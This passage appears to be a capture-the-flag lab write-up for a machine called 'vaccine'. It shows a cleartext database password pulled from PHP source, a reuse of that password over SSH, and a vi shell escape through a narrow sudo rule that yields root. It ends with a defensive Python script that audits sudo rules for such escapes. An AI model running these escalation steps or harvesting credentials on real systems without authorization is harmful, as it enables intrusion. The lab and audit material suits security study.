VI
#privesc
postgres@vaccine:~$ sudo -l
sudo -l
[sudo] password for postgres: ...
postgres@vaccine:~$ ls /var/www/html
bg.png dashboard.js index.php style.css
dashboard.css dashboard.php license.txt
* if the target runs a PHP application backed by a SQL database, there is a chance the database password is
stored in cleartext in the application source under /var/www/html
postgres@vaccine:~$ cat /var/www/html/dashboard.php | grep password
<in$ cat /var/www/html/dashboard.php | grep password
$conn = pg_connect("host=localhost port=5432 dbname=carsdb user=postgres password=P@s5w0rd!");
postgres@vaccine:~$ sudo -l
[sudo] password for postgres: P@s5w0rd!
Matching Defaults entries for postgres on vaccine:
env_keep+="LANG LANGUAGE LINGUAS LC_* _XKB_CHARSET", env_keep+="XAPPLRESDIR
XFILESEARCHPATH XUSERFILESEARCHPATH",
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
mail_badpass
User postgres may run the following commands on vaccine:
(ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf
* ALT: log in over SSH with the recovered password if/when the shell dies
ssh postgres@10.129.95.174
password: P@s5w0rd!
* identified... sudo privileges to edit the pg_hba.conf file using vi by running sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf
root@htb:~$ BROWSER > https://gtfobins.github.io/gtfobins/vi/#sudo
sudo vi -c ':!/bin/sh' /dev/null
* if the binary is allowed to run as superuser by sudo, it does not drop the
elevated privileges and may be used to access the file system, escalate or
maintain privileged access.
#
postgres@vaccine:~$ sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf -c ':!/bin/sh'
Sorry, user postgres is not allowed to execute '/bin/vi /etc/postgresql/11/main/pg_hba.conf -c :!/bin/sh' as root on vaccine.
* this fails because the sudoers rule permits only the exact command /bin/vi /etc/postgresql/11/main/pg_hba.conf; sudo matches the arguments as well, so the appended -c option is rejected.
postgres@vaccine:~$ sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf
...
vi :set shell=/bin/bash
vi :shell
root@vaccine:/var/lib/postgresql# whoami
root
root@vaccine:/var/lib/postgresql# id
uid=0(root) gid=0(root) groups=0(root)
root@vaccine:/var/lib/postgresql# ls /root
pg_hba.conf root.txt snap
root@vaccine:/var/lib/postgresql# cat /root/root.txt
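
Added example (not part of the original notes): a defender-side check that reads `sudo -l` output and flags rules like the one above, where an editor or pager with a built-in shell escape is granted without NOEXEC. The `audit` function, the program list and the two extra sample rules are assumptions made for illustration.

```python
import os
import re

# Programs with a built-in "run a command/shell" feature (a subset of what GTFOBins lists).
SHELL_ESCAPE = {"vi", "vim", "view", "ex", "ed", "nano", "less", "more", "man", "emacs"}
ENTRY = re.compile(r"^\s*\([^)]*\)\s*(\S.*)$")   # "(runas) [TAG:] cmd[, cmd...]"
TAGS = re.compile(r"^(?:[A-Z_]+:\s*)+")          # e.g. "NOPASSWD: NOEXEC: "


def audit(sudo_l_output):
    """Return [(command, advice)] for rules granting an escapable program without NOEXEC."""
    findings = []
    for line in sudo_l_output.splitlines():
        entry = ENTRY.match(line)
        if not entry:
            continue                              # Defaults, headers, prompts
        noexec = False                            # tags carry over to later commands on the line
        for cmd in re.split(r"(?<!\\),\s*", entry.group(1)):
            tags = TAGS.match(cmd)
            if tags:
                for tag in re.findall(r"[A-Z_]+", tags.group()):
                    noexec = {"NOEXEC": True, "EXEC": False}.get(tag, noexec)
                cmd = cmd[tags.end():]
            argv = cmd.split()
            if not argv or os.path.basename(argv[0]) not in SHELL_ESCAPE or noexec:
                continue
            if len(argv) == 2 and argv[1].startswith("/"):
                # sudoedit runs the editor as the invoking user on a temporary copy
                advice = "grant 'sudoedit %s' instead" % argv[1]
            else:
                advice = "add NOEXEC: or remove the rule"
            findings.append((cmd, advice))
    return findings


# The /bin/vi rule is from the session above; the other two rules are constructed.
SAMPLE = """\
User postgres may run the following commands on vaccine:
    (ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf
    (root) NOPASSWD: NOEXEC: /usr/bin/less /var/log/syslog
    (ALL) sudoedit /etc/hosts, /usr/bin/pg_ctlcluster 11 main reload
"""

if __name__ == "__main__":
    for command, advice in audit(SAMPLE):
        print("%-50s -> %s" % (command, advice))
```

NOEXEC only stops dynamically linked programs from executing further commands, so `sudoedit` is the stronger fix when the goal is to let a user edit one file.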